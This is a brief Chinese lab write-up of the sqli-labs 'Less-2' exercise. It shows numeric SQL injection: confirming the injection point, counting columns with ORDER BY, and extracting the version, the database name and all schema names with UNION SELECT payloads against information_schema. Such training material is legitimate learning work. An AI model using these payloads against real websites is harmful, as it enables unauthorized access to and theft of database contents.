Less-2

0x00
目标:取得security数据库中的emails表里的数据

0x01
加一个?id=1, 添加一个单引号发现报错, 后来再构造成?id=1' and 1=1--+发现还是报错, 尝试?id=1 and 1=1发现正常,于是认为是数字型注入.

1.png
2.png

同样是order by判断有几列可以显示数据
直接order by 3正常, order by 4 报超出范围可以认为只有三列, 这里跟less-1有点区别, 但是都正确, 这种貌似更省力

3.png
4.png

构造union select 1,version(),database()来查询数据库版本以及数据库名称, 这里关于查询版本有两种方式@@version也可以

5.png
6.png

构造语句查询所有数据库名
union select 1,2,(select group_concat(schema_name) from information_schema.schemata), 后面的方法都是类似Less-1, 主要就是这个是数字型注入, 不用在前面添加单引号和后面的注释符而已

7.png